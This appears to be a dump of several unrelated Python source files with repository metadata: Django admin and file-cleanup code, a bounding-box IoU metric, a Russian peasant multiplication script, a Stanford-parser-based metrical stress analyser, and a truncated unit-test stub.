] | 31 | 2020-08-10T22:37:41.000Z | 2022-03-09T21:35:56.000Z | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
] | null | null | null | Chapter11/grades_ms/grades/grades_svc/admin.py | MichaelRW/Python-for-Geeks | a111f61f1a0b077fc0524431e1ccefd9214d5c53 | [
"MIT"
] | 21 | 2020-08-10T22:37:44.000Z | 2022-03-07T07:26:28.000Z | from django.contrib import admin
from .models import Grade
admin.site.register(Grade)
| 17.4 | 32 | 0.816092 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5a523e97c8871c1b7a642d8e7e1284f0ce9a2ec | 1,492 | py | Python | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | null | null | null | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | 1 | 2020-09-02T07:53:51.000Z | 2020-09-02T07:53:51.000Z | tracksuite/utils/metrics.py | jimiolaniyan/tracksuite | f05c40e7b78ce2bb623a4ae76c08997a41585152 | [
"MIT"
] | null | null | null | import numpy as np
def calculate_iou(bboxes1, bboxes2):
"""
This calculates the intersection over union of N bounding boxes
in the form N x [left, top, right, bottom], e.g for N=2:
>> bb = [[21,34,45,67], [67,120, 89, 190]]
:param bboxes1: np array: N x 4 ground truth bounding boxes
:param bboxes2: np array: N x 4 target bounding boxes
:return: iou: ratio between 0 and 1
"""
if len(bboxes1.shape) == 1:
bboxes1 = bboxes1.reshape(1, bboxes1.shape[0])
if len(bboxes2.shape) == 1:
bboxes2 = bboxes2.reshape(1, bboxes2.shape[0])
if bboxes1.shape[0] != bboxes2.shape[0] or bboxes1.shape[1] != bboxes2.shape[1]:
raise ValueError('Bounding boxes must be of equal dimension')
left_intersection = np.maximum(bboxes1[:, 0], bboxes2[:, 0])
top_intersection = np.maximum(bboxes1[:, 1], bboxes2[:, 1])
right_intersection = np.minimum(bboxes1[:, 2], bboxes2[:, 2])
bottom_intersection = np.minimum(bboxes1[:, 3], bboxes2[:, 3])
w_intersection = right_intersection - left_intersection
h_intersection = bottom_intersection - top_intersection
intersection_area = w_intersection * h_intersection
bboxes1_area = (bboxes1[:, 2] - bboxes1[:, 0]) * (bboxes1[:, 3] - bboxes1[:, 1])
bboxes2_area = (bboxes2[:, 2] - bboxes2[:, 0]) * (bboxes2[:, 3] - bboxes2[:, 1])
union_area = bboxes1_area + bboxes2_area - intersection_area
iou = np.clip(intersection_area/union_area, 0, 1)
return iou | 38.25641 | 84 | 0.656166 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 393 | 0.263405 |
d5a7dc8916eb01cb85de2b374c6b24801f3724ff | 2,027 | py | Python | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 11 | 2018-10-03T23:57:04.000Z | 2020-04-04T05:06:15.000Z | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 28 | 2018-10-04T07:31:07.000Z | 2020-01-08T15:43:28.000Z | Python/RussianPeasantMult.py | sheenxavi004/problem-solving | 8541ed52ff1f17031a2190b18dd5b128dd334c2d | [
"MIT"
] | 78 | 2018-10-04T06:28:58.000Z | 2021-12-12T07:07:13.000Z | """
Russian Peasant Multiplication (RPM) Algorithm Implemented In Python
RPM is a method of mutiplication of any 2 numbers using only multiplication
and division by 2.
The basics are that you divide the second number by 2 (integer division) until
it equals 1, every time you divide the second number by 2, you also multiply
the first number by 2. After the second number hits 1, you then remove all right
side values that are even. Finally you add all of the left side values that are
left.
EXAMPLE:
10*5:
10 5 <== We add left side value (10) to total
10*2=20 5/2=2 <== We don't use this line since int(5/2) is an even number
20*2=40 2/2=1 <== We add left side value (40) to total
10 + 40 = 50
10 * 5 = 50
"""
import sys
def RPMult(x, y):
# Create an empty list to store values of each mult/div by 2
# Set total value to 0
total = 0
val_list =[]
count = 0
# If y is already equal to 1, return the value of x as total
if y != 1:
# Loop through calculations until y is equal to 1
while y >= 1:
# Add values of x and y to list
val_list.append((x, y))
# Division and multiplication by 2 on each side of equation
y = int(y/2)
x = x*2
else:
total = x
# Loop through list to calculate result of multiplication
for val in val_list:
# If the mod of val[1] returns anything other than 0, we add val[0] to
# the total result of the multiplication
if val[1]%2 >= 1:
total += val[0]
return total
def main():
arguments = len(sys.argv) - 1
if arguments != 2:
print("Error please pass two integer values!")
print("Usage: python RussianPeasantMult.py <int1> <int2>")
else:
try:
x = int(sys.argv[1])
y = int(sys.argv[2])
except ValueError:
print("Error: You can only pass integer values to program")
return
print(RPMult(x, y))
if __name__ == "__main__":
main() | 32.174603 | 80 | 0.618155 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,322 | 0.652195 |
d5a7f3dd6c594271ad5f5ffe349ea681ebe4fe26 | 34,989 | py | Python | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | celery-queue/metrical-tree/metricaltree.py | HwanSolo/stanford-linguistics | c3a7e7452dacca9c1d4bfde1667b82596193b434 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python # -*- coding: utf-8 -*-
import os
from collections import defaultdict
import cPickle as pkl
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import codecs
import nltk
from nltk import compat
from nltk.tree import Tree
import nltk.data
from deptree import DependencyTree, DependencyTreeParser
import argparse
def Get_script_directory():
absolute_path = os.path.abspath(__file__)
return os.path.dirname(absolute_path)
DATE = '2015-04-20'
MODELS_VERSION = '3.5.2'
EJML_VERSION = '0.23'
script_dir = Get_script_directory()
os.environ['STANFORD_PARSER'] = os.path.join(
script_dir, 'stanford-library/stanford-parser-full-%s/stanford-parser.jar' % DATE)
os.environ['STANFORD_MODELS'] = os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/stanford-parser-%s-models.jar' % (
DATE, MODELS_VERSION))
os.environ['STANFORD_EJML'] = os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/ejml-%s.jar' % (
DATE, EJML_VERSION))
pickle_path = os.path.join(script_dir, "pickle_jar", "sylcmu.pkl")
sylcmu = pkl.load(open(pickle_path))
sent_splitter = nltk.data.load('tokenizers/punkt/english.pickle')
def Extant_file(value):
# Type for argparse - checks that file exists but does not open.
if not os.path.exists(value):
raise argparse.ArgumentTypeError("{0} does not exist".format(value))
return value
def Replace_dashes_with_underscores(string):
return string.replace("-", "_")
def Validate_arguments():
parser = argparse.ArgumentParser(
description='Compute T-orders in constraint-based phonology')
parser.add_argument("-f", "--input-file", dest="input",
help="input txt file", metavar="<FILEPATH>", type=Extant_file)
parser.add_argument("-o", "--output", dest="output_directory",
help="output path for results (default: current script directory)", metavar="<FILEPATH>")
parser.add_argument("--unstressed_words", dest="unstressed_words", default=[],
nargs='+', help="List of strings to use for unstressed words")
parser.add_argument("--unstressed_tags", dest="unstressed_tags", default=[],
nargs='+', help="List of strings to use for unstressed tags")
parser.add_argument("--unstressed_deps", dest="unstressed_deps", default=[],
nargs='+', help="List of strings to use for unstressed deps")
parser.add_argument("--ambiguous_words", dest="ambiguous_words", default=[],
nargs='+', help="List of strings to use for ambiguous words")
parser.add_argument("--ambiguous_tags", dest="ambiguous_tags", default=[],
nargs='+', help="List of strings to use for ambiguous tags")
parser.add_argument("--ambiguous_deps", dest="ambiguous_deps", default=[],
nargs='+', help="List of strings to use for ambiguous deps")
parser.add_argument("--stressed_words", dest="stressed_words", default=[],
nargs='+', help="List of strings to use for stressed words")
args = parser.parse_args()
return args
def Create_directory(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def Set_output_directory(directory):
if directory:
Create_directory(directory)
return directory
else:
return Get_script_directory()
# =================================================================================================
# Entrypoint
# =================================================================================================
args = Validate_arguments()
# =================================================================================================
# Optional parameters
# =================================================================================================
output_prefix = Set_output_directory(args.output_directory) + "/"
unstressed_words = args.unstressed_words
unstressed_tags = args.unstressed_tags
unstressed_deps = args.unstressed_deps
ambiguous_words = args.ambiguous_words
ambiguous_tags = args.ambiguous_tags
ambiguous_deps = args.ambiguous_deps
stressed_words = args.stressed_words
# ***********************************************************************
# Multiprocessing worker
def parse_worker(q):
""""""
parser = DependencyTreeParser(
model_path=os.path.join(script_dir, 'stanford-library/stanford-parser-full-%s/edu/stanford/nlp/models/lexparser/englishPCFG.ser.gz' % DATE))
parser = MetricalTreeParser(parser)
for filename in iter(q.get, 'STOP'):
sents = []
with codecs.open(filename, encoding='utf-8') as f:
for line in f:
sents.extend(pause_splitter(line))
df = parser.stats_raw_parse_sents(sents, arto=True)
output_path = os.path.join(output_prefix, 'results.csv')
df.to_csv(codecs.open(output_path, 'w', encoding='utf-8'), index=False)
return True
# ***********************************************************************
# Split a text on certain punctuation
def pause_splitter(s):
""""""
s = s.strip()
s = re.sub('([:;]|--+)', '\g<1>\n', s)
s = s.split('\n')
s = [sent for sents in s for sent in sent_splitter.tokenize(sents)]
return s
# ***********************************************************************
# Metrical Tree class
class MetricalTree(DependencyTree):
""""""
# Disable defaults as they are now being managed by the application wrapper
# _unstressedWords = ('it',) if not unstressed_words else tuple(
# unstressed_words)
# _unstressedTags = ('CC', 'PRP$', 'TO', 'UH',
# 'DT') if not unstressed_tags else tuple(unstressed_tags)
# _unstressedDeps = (
# 'det', 'expl', 'cc', 'mark') if not unstressed_deps else tuple(unstressed_deps)
# _ambiguousWords = ('this', 'that', 'these',
# 'those') if not ambiguous_words else tuple(ambiguous_words)
# _ambiguousTags = ('MD', 'IN', 'PRP', 'WP$', 'PDT', 'WDT', 'WP',
# 'WRB') if not ambiguous_tags else tuple(ambiguous_tags)
# _ambiguousDeps = ('cop', 'neg', 'aux',
# 'auxpass') if not ambiguous_deps else tuple(ambiguous_deps)
# _stressedWords = tuple() if not stressed_words else tuple(stressed_words)
_unstressedWords = tuple() if not unstressed_words else tuple(
unstressed_words)
_unstressedTags = tuple() if not unstressed_tags else tuple(unstressed_tags)
_unstressedDeps = tuple() if not unstressed_deps else tuple(unstressed_deps)
_ambiguousWords = tuple() if not ambiguous_words else tuple(ambiguous_words)
_ambiguousTags = tuple() if not ambiguous_tags else tuple(ambiguous_tags)
_ambiguousDeps = tuple() if not ambiguous_deps else tuple(ambiguous_deps)
_stressedWords = tuple() if not stressed_words else tuple(stressed_words)
# =====================================================================
# Initialize
def __init__(self, node, children, dep=None, lstress=0, pstress=np.nan, stress=np.nan):
""""""
self._lstress = lstress
self._pstress = pstress
self._stress = stress
super(MetricalTree, self).__init__(node, children, dep)
self.set_label()
if self._preterm:
if self[0].lower() in sylcmu:
syll_info = sylcmu[self[0].lower()]
self._seg = syll_info[0]
self._nsyll = len(syll_info[1])
self._nstress = len(
filter(lambda x: x[1] in ('P', 'S'), syll_info[1]))
else:
self._seg = None
self._nsyll = np.nan
self._nstress = np.nan
# =====================================================================
# Get the lexical stress of the node
def lstress(self):
""""""
return self._lstress
# =====================================================================
# Get the phrasal stress of the node
def pstress(self):
""""""
return self._pstress
# =====================================================================
# Get the stress of the node
def stress(self):
""""""
return self._stress
# =====================================================================
# Get the segments
def seg(self):
""""""
return self._seg if self._seg is not None else []
# =====================================================================
# Get the number of segments
def nseg(self):
""""""
return len(self._seg) if self._seg is not None else np.nan
# =====================================================================
# Get the number of syllables
def nsyll(self):
""""""
return self._nsyll
# =====================================================================
# Get the number of stresses
def nstress(self):
""""""
return self._nstress
# =====================================================================
# Get the lexical stress of the leaf nodes
def lstresses(self, leaves=True):
""""""
for preterminal in self.preterminals(leaves=True):
if leaves:
yield (preterminal._lstress, preterminal[0])
else:
yield preterminal._lstress
# =====================================================================
# Get the phrasal stress of the leaf nodes
def pstresses(self, leaves=True):
""""""
for preterminal in self.preterminals(leaves=True):
if leaves:
yield (preterminal._pstress, preterminal[0])
else:
yield preterminal._pstress
# =====================================================================
# Get the lexical stress of the leaf nodes
def stresses(self, leaves=True, arto=False):
""""""
for preterminal in self.preterminals(leaves=True):
if leaves:
if arto:
if preterminal._stress is None:
yield (None, preterminal[0])
elif preterminal._lstress == -1:
yield (0, preterminal[0])
else:
yield (-(preterminal._stress-1), preterminal[0])
else:
yield (preterminal._stress, preterminal[0])
else:
if arto:
if preterminal._stress is None:
yield None
elif preterminal._lstress == -1:
yield 0
else:
yield -(preterminal._stress-1)
else:
yield preterminal._stress
# =====================================================================
# Get the number of syllables of the leaf nodes
def nsylls(self, leaves=True):
""""""
for preterminal in self.preterminals(leaves=True):
if leaves:
yield (preterminal._nsyll, preterminal[0])
else:
yield preterminal._nsyll
# =====================================================================
# Set the lexical stress of the node
def set_lstress(self):
""""""
if self._preterm:
if self[0].lower() in super(MetricalTree, self)._contractables:
self._lstress = np.nan
elif self._cat in super(MetricalTree, self)._punctTags:
self._lstress = np.nan
elif self[0].lower() in MetricalTree._unstressedWords:
self._lstress = -1
elif self[0].lower() in MetricalTree._ambiguousWords:
self._lstress = -.5
elif self[0].lower() in MetricalTree._stressedWords:
self._lstress = 0
elif self._cat in MetricalTree._unstressedTags:
self._lstress = -1
elif self._cat in MetricalTree._ambiguousTags:
self._lstress = -.5
elif self._dep in MetricalTree._unstressedDeps:
self._lstress = -1
elif self._dep in MetricalTree._ambiguousDeps:
self._lstress = -.5
else:
self._lstress = 0
if self[0].lower() == 'that' and (self._cat == 'DT' or self._dep == 'det'):
self._lstress = -.5
else:
for child in self:
child.set_lstress()
self.set_label()
# =====================================================================
# Set the phrasal stress of the tree
def set_pstress(self):
""""""
# Basis
if self._preterm:
try:
assert self._lstress != -.5
except:
raise ValueError(
'The tree must be disambiguated before assigning phrasal stress')
self._pstress = self._lstress
else:
# Recurse
for child in self:
child.set_pstress()
assigned = False
# Noun compounds (look for sequences of N*)
if self._cat == 'NP':
skipIdx = None
i = len(self)
for child in self[::-1]:
i -= 1
if child._cat.startswith('NN'):
if not assigned and skipIdx is None:
skipIdx = i
child._pstress = -1
child.set_label()
elif not assigned:
child._pstress = 0
child.set_label()
assigned = True
else:
child._pstress = -1
child.set_label()
elif assigned:
child._pstress = -1
child.set_label()
else:
if not assigned and skipIdx is not None:
self[skipIdx]._pstress = 0
self[skipIdx].set_label()
assigned = True
child._pstress = -1
child.set_label()
else:
break
if not assigned and skipIdx is not None:
self[skipIdx]._pstress = 0
self[skipIdx].set_label()
assigned = True
# Everything else
if not assigned:
for child in self[::-1]:
if not assigned and child._pstress == 0:
assigned = True
elif not np.isnan(child._pstress):
child._pstress = -1
child.set_label()
if not assigned:
self._pstress = -1
else:
self._pstress = 0
self.set_label()
# =====================================================================
# Set the total of the tree
def set_stress(self, stress=0):
""""""
self._stress = self._lstress + self._pstress + stress
if not self._preterm:
for child in self:
child.set_stress(self._stress)
self.set_label()
# =====================================================================
# Reset the label of the node (cat < dep < lstress < pstress < stress
def set_label(self):
""""""
if self._stress is not np.nan:
self._label = '%s/%s' % (self._cat, self._stress)
elif self._pstress is not np.nan:
self._label = '%s/%s' % (self._cat, self._pstress)
elif self._lstress is not np.nan:
self._label = '%s/%s' % (self._cat, self._lstress)
elif self._dep is not None:
self._label = '%s/%s' % (self._cat, self._dep)
else:
self._label = '%s' % self._cat
# =====================================================================
# Convert between different subtypes of Metrical Trees
@classmethod
def convert(cls, tree):
"""
Convert a tree between different subtypes of Tree. ``cls`` determines
which class will be used to encode the new tree.
:type tree: Tree
:param tree: The tree that should be converted.
:return: The new Tree.
"""
if isinstance(tree, Tree):
children = [cls.convert(child) for child in tree]
if isinstance(tree, MetricalTree):
return cls(tree._cat, children, tree._dep, tree._lstress)
elif isinstance(tree, DependencyTree):
return cls(tree._cat, children, tree._dep)
else:
return cls(tree._label, children)
else:
return tree
# =====================================================================
# Approximate the number of ambiguous parses
def ambiguity(self, stress_polysyll=False):
""""""
nambig = 0
for preterminal in self.preterminals():
if preterminal.lstress() == -.5:
if not stress_polysyll or (preterminal.nsyll() == 1):
nambig += 1
return nambig
# =====================================================================
# Generate all possible trees
# Syll=True sets all polysyllabic words to stressed
def ambiguate(self, stress_polysyll=False):
""""""
if self._preterm:
if self._lstress != -.5:
return [self.copy()]
else:
alts = []
if not stress_polysyll or self._nsyll == 1:
self._lstress = -1
alts.append(self.copy())
self._lstress = 0
alts.append(self.copy())
self._lstress = -.5
return alts
else:
alts = [[]]
for child in self:
child_alts = child.disambiguate(syll)
for i in xrange(len(alts)):
alt = alts.pop(0)
for child_alt in child_alts:
alts.append(alt + [child_alt])
return [MetricalTree(self._cat, alt, self._dep) for alt in alts]
# =====================================================================
# Disambiguate a tree with the maximal stressed pattern
def max_stress_disambiguate(self):
""""""
if self._preterm:
if self._lstress != -.5:
return [self.copy()]
else:
alts = []
self._lstress = 0
alts.append(self.copy())
self._lstress = -.5
return alts
else:
alts = [[]]
for child in self:
child_alts = child.max_stress_disambiguate()
for i in xrange(len(alts)):
alt = alts.pop(0)
for child_alt in child_alts:
alts.append(alt + [child_alt])
return [MetricalTree(self._cat, alt, self._dep) for alt in alts]
# =====================================================================
# Disambiguate a tree with the minimal stressed pattern
def min_stress_disambiguate(self, stress_polysyll=False):
""""""
if self._preterm:
if self._lstress != -.5:
return [self.copy()]
else:
alts = []
if not stress_polysyll or self._nsyll == 1:
self._lstress = -1
else:
self._lstress = 0
alts.append(self.copy())
self._lstress = -.5
return alts
else:
alts = [[]]
for child in self:
child_alts = child.min_stress_disambiguate(stress_polysyll)
for i in xrange(len(alts)):
alt = alts.pop(0)
for child_alt in child_alts:
alts.append(alt + [child_alt])
return [MetricalTree(self._cat, alt, self._dep) for alt in alts]
# =====================================================================
# Copy the tree
def copy(self, deep=False):
""""""
if not deep:
return type(self)(self._cat, self, dep=self._dep, lstress=self._lstress)
else:
return type(self).convert(self)
# ***********************************************************************
# Parser for Metrical Trees
class MetricalTreeParser:
""""""
# =====================================================================
# Initialize
def __init__(self, deptreeParser=None):
""""""
if deptreeParser is None:
sys.stderr.write('No deptreeParser provided, defaulting to PCFG\n')
deptreeParser = 'PCFG'
if isinstance(deptreeParser, compat.string_types):
deptreeParser = DependencyTreeParser(
model_path=os.path.join(script_dir, 'stanford-parser-full-%s/edu/stanford/nlp/models/lexparser/english%s.ser.gz' % (DATE, deptreeParser)))
elif not isinstance(deptreeParser, DependencyTreeParser):
raise ValueError('Provided an invalid dependency tree parser')
self.deptreeParser = deptreeParser
# =====================================================================
# Use StanfordParser to parse a list of tokens
def dep_parse_sents(self, sentences, verbose=False):
""""""
return self.deptreeParser.parse_sents(sentences, verbose)
# =====================================================================
# Use StanfordParser to parse a raw sentence
def dep_raw_parse(self, sentence, verbose=False):
""""""
return self.deptreeParser.raw_parse(sentence, verbose)
# =====================================================================
# Use StanfordParser to parse multiple raw sentences
def dep_raw_parse_sents(self, sentences, verbose=False):
""""""
return self.deptreeParser.raw_parse_sents(sentences, verbose)
# =====================================================================
# Use StanfordParser to parse multiple preprocessed sentences
def dep_tagged_parse_sent(self, sentence, verbose=False):
""""""
return self.deptreeParser.tagged_parse_sent(sentence, verbose)
# =====================================================================
# Use StanfordParser to parse multiple preprocessed sentences
def dep_tagged_parse_sents(self, sentences, verbose=False):
""""""
return self.deptreeParser.tagged_parse_sents(sentences, verbose)
# =====================================================================
# Parse a list of tokens into lexical Metrical Trees
def lex_parse_sents(self, sentences, verbose=False):
""""""
sentences = self.dep_parse_sents(sentences, verbose)
for tree in sentences:
for t in tree:
t = MetricalTree.convert(t)
t.set_lstress()
yield t
# =====================================================================
# Parse a raw sentence into lexical Metrical Trees
def lex_raw_parse(self, sentence, verbose=False):
""""""
sentence = self.dep_raw_parse(sentence, verbose)
for t in sentence:
t = MetricalTree.convert(t)
t.set_lstress()
yield t
# =====================================================================
# Parse a string into lexical Metrical Trees
def lex_raw_parse_sents(self, sentences, verbose=False):
""""""
sentences = self.dep_raw_parse_sents(sentences, verbose)
for tree in sentences:
for t in tree:
t = MetricalTree.convert(t)
t.set_lstress()
yield t
# =====================================================================
# Parse a tagged sentence into lexical Metrical Trees
def lex_tagged_parse(self, sentence, verbose=False):
""""""
sentence = self.dep_tagged_parse(sentence, verbose)
for t in sentence:
t = MetricalTree.convert(t)
t.set_lstress()
yield t
# =====================================================================
# Parse a raw sentence into lexical Metrical Trees
def lex_tagged_parse_sents(self, sentences, verbose=False):
""""""
sentences = self.dep_tagged_parse_sents(sentences, verbose)
for tree in sentences:
for t in tree:
t = MetricalTree.convert(t)
t.set_lstress()
yield t
# =====================================================================
# Parse a list of tokens into phrasal Metrical Trees
def phr_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
""""""
for t in self.lex_parse_sents(sentences, verbose):
trees = t.disambiguate(stress_polysyll)
for tree in trees:
tree.set_pstress()
tree.set_stress()
yield trees
# =====================================================================
# Parse a string into phrasal Metrical Trees
def phr_raw_parse(self, sentences, stress_polysyll=False, verbose=True):
""""""
for t in self.lex_raw_parse(sentences, verbose):
trees = t.disambiguate(stress_polysyll)
for tree in trees:
tree.set_pstress()
tree.set_stress()
yield trees
# =====================================================================
# Parse a list of strings into phrasal Metrical Trees
def phr_raw_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
""""""
for t in self.lex_raw_parse_sents(sentences, verbose):
trees = t.disambiguate(stress_polysyll)
for tree in trees:
tree.set_pstress()
tree.set_stress()
yield trees
# =====================================================================
# Parse a list of tagged strings into phrasal Metrical Trees
def phr_tagged_parse(self, sentences, stress_polysyll=False, verbose=True):
""""""
for t in self.lex_tagged_parse(sentences, verbose):
trees = t.disambiguate(stress_polysyll)
for tree in trees:
tree.set_pstress()
tree.set_stress()
yield trees
# =====================================================================
# Parse a list of strings into phrasal Metrical Trees
def phr_tagged_parse_sents(self, sentences, stress_polysyll=False, verbose=True):
""""""
for t in self.lex_tagged_parse_sents(sentences, verbose):
trees = t.disambiguate(stress_polysyll)
for tree in trees:
tree.set_pstress()
tree.set_stress()
yield trees
# =============================================================
def get_stats(self, generator, arto=False):
""""""
data = defaultdict(list)
i = 0
for t in generator:
i += 1
ambig1 = t.ambiguity(stress_polysyll=False)
ambig2 = t.ambiguity(stress_polysyll=True)
tree1 = t.max_stress_disambiguate()[0]
tree1.set_pstress()
tree1.set_stress()
tree2a = t.min_stress_disambiguate(stress_polysyll=True)[0]
tree2a.set_pstress()
tree2a.set_stress()
tree2b = t.min_stress_disambiguate(stress_polysyll=False)[0]
tree2b.set_pstress()
tree2b.set_stress()
j = 0
preterms1 = list(tree1.preterminals())
min1 = float(min(
[preterm.stress() for preterm in preterms1 if not np.isnan(preterm.stress())]))
max1 = max([preterm.stress() for preterm in preterms1 if not np.isnan(
preterm.stress())]) - min1
preterms2a = list(tree2a.preterminals())
min2a = float(min(
[preterm.stress() for preterm in preterms2a if not np.isnan(preterm.stress())]))
max2a = max([preterm.stress() for preterm in preterms2a if not np.isnan(
preterm.stress())]) - min2a
preterms2b = list(tree2b.preterminals())
min2b = float(min(
[preterm.stress() for preterm in preterms2b if not np.isnan(preterm.stress())]))
max2b = max([preterm.stress() for preterm in preterms2b if not np.isnan(
preterm.stress())]) - min2b
preterms_raw = list(t.preterminals())
minmean = float(min([np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]) for preterm1,
preterm2a, preterm2b in zip(preterms1, preterms2a, preterms2b) if not np.isnan(preterm1.stress())]))
maxmean = max([np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]) for preterm1, preterm2a,
preterm2b in zip(preterms1, preterms2a, preterms2b) if not np.isnan(preterm1.stress())]) - minmean
sent = ' '.join([preterm[0] for preterm in preterms_raw])
sentlen = len(preterms_raw)
for preterm1, preterm2a, preterm2b, preterm_raw in zip(preterms1, preterms2a, preterms2b, preterms_raw):
j += 1
data['widx'].append(j)
data['norm_widx'].append(float(j) / sentlen)
data['word'].append(preterm1[0])
if preterm_raw._lstress == 0:
data['lexstress'].append('yes')
elif preterm_raw._lstress == -.5:
data['lexstress'].append('ambig')
elif preterm_raw._lstress == -1:
data['lexstress'].append('no')
else:
data['lexstress'].append('???')
data['seg'].append(' '.join(preterm1.seg()))
data['nseg'].append(preterm1.nseg())
data['nsyll'].append(preterm1.nsyll())
data['nstress'].append(preterm1.nstress())
data['pos'].append(preterm1.category())
data['dep'].append(preterm1.dependency())
if arto:
data['m1'].append(-(preterm1.stress()-1))
data['m2a'].append(-(preterm2a.stress()-1))
data['m2b'].append(-(preterm2b.stress()-1))
data['mean'].append(-(np.mean([preterm1.stress(),
preterm2a.stress(), preterm2b.stress()])-1))
else:
data['m1'].append(preterm1.stress())
data['m2a'].append(preterm2a.stress())
data['m2b'].append(preterm2b.stress())
data['mean'].append(
np.mean([preterm1.stress(), preterm2a.stress(), preterm2b.stress()]))
data['norm_m1'].append((preterm1.stress()-min1)/max1)
data['norm_m2a'].append((preterm2a.stress()-min2a)/max2a)
data['norm_m2b'].append((preterm2b.stress()-min2b)/max2b)
data['norm_mean'].append((np.mean(
[preterm1.stress(), preterm2a.stress(), preterm2b.stress()])-minmean)/maxmean)
data['sidx'].append(i)
data['sent'].append(sent)
data['ambig_words'].append(ambig1)
data['ambig_monosyll'].append(ambig2)
data['contour'].extend([' '.join(str(x)
for x in data['mean'][-(j):])]*j)
for k, v in data.iteritems():
data[k] = pd.Series(v)
return pd.DataFrame(data, columns=['widx', 'norm_widx', 'word', 'seg', 'lexstress',
'nseg', 'nsyll', 'nstress',
'pos', 'dep',
'm1', 'm2a', 'm2b', 'mean',
'norm_m1', 'norm_m2a', 'norm_m2b', 'norm_mean',
'sidx', 'sent', 'ambig_words', 'ambig_monosyll',
'contour'])
# =====================================================================
# Parse a list of tokens into phrasal Metrical Trees
def stats_parse_sents(self, sentences, arto=False, verbose=True):
""""""
return self.get_stats(self.lex_parse_sents(sentences, verbose), arto=arto)
# =====================================================================
# Parse a string into phrasal Metrical Trees
def stats_raw_parse(self, sentence, arto=False, verbose=True):
""""""
return self.get_stats(self.lex_raw_parse(sentence, verbose), arto=arto)
# =====================================================================
# Parse a string into phrasal Metrical Trees
def stats_raw_parse_sents(self, sentences, arto=False, verbose=True):
""""""
return self.get_stats(self.lex_raw_parse_sents(sentences, verbose), arto=arto)
# =====================================================================
# Parse a list of tagged tokens into phrasal Metrical Trees
def stats_tagged_parse(self, sentence, arto=False, verbose=True):
""""""
return self.get_stats(self.lex_tagged_parse(sentence, verbose), arto=arto)
# =====================================================================
# Parse a list of tagged tokens into phrasal Metrical Trees
def stats_tagged_parse_sents(self, sentences, arto=False, verbose=True):
""""""
return self.get_stats(self.lex_tagged_parse_sents(sentences, verbose), arto=arto)
# ***********************************************************************
# Test the module
if __name__ == '__main__':
""""""
import glob
import re
import multiprocessing as mp
import sys
file = args.input
files = [file]
try:
workers = mp.cpu_count()
except:
workers = 1
q = mp.Queue()
for filename in files:
q.put(filename)
for worker in xrange(workers):
q.put('STOP')
processes = []
for worker in xrange(workers):
process = mp.Process(target=parse_worker, args=(q,))
process.start()
processes.append(process)
for process in processes:
process.join()
| 39.225336 | 154 | 0.494898 | 28,775 | 0.822401 | 4,684 | 0.133871 | 748 | 0.021378 | 0 | 0 | 9,579 | 0.273772 |
d5ab5835f2e337b522ce060307e167093634b260 | 1,056 | py | Python | multiuploader/management/commands/clean_uploads.py | SharmaVinayKumar/django-multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | 5 | 2017-02-25T21:12:37.000Z | 2017-03-12T15:05:55.000Z | multiuploader/management/commands/clean_uploads.py | SharmaVinayKumar/django-multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | 4 | 2017-02-25T19:08:23.000Z | 2017-03-12T15:53:54.000Z | multiuploader/management/commands/clean_uploads.py | vinaypost/multiuploader | 58e545307014830b00101129a297b6d465b87583 | [
"MIT"
] | null | null | null | from __future__ import print_function, unicode_literals
import os
from datetime import timedelta
import multiuploader.default_settings as DEFAULTS
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils.timezone import now
from multiuploader.models import MultiuploaderFile
class Command(BaseCommand):
help = 'Clean all temporary attachments loaded to MultiuploaderFile model'
def handle(self, *args, **options):
expiration_time = getattr(settings, "MULTIUPLOADER_FILE_EXPIRATION_TIME",
DEFAULTS.MULTIUPLOADER_FILE_EXPIRATION_TIME)
time_threshold = now() - timedelta(seconds=expiration_time)
for attach in MultiuploaderFile.objects.filter(upload_date__lt=time_threshold):
try:
os.remove(attach.file.path)
except Exception as ex:
print(ex)
MultiuploaderFile.objects.filter(upload_date__lt=time_threshold).delete()
print("Cleaning temporary upload files complete")
| 35.2 | 87 | 0.730114 | 730 | 0.691288 | 0 | 0 | 0 | 0 | 0 | 0 | 145 | 0.137311 |
d5ab995005d2f182743e6f37ffa3d88f794d55fe | 540 | py | Python | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | tests/test_source.py | Koech-code/News-App | 07688d64df5d0512a8d59613d403f7d6a7377360 | [
"MIT"
] | null | null | null | import unittest
from app.models import Source
class testSource(unittest.TestCase):
"""
SourcesTest class to test the behavior of the Sources class
"""
def setUp(self):
"""
Method that runs before each other test runs
"""
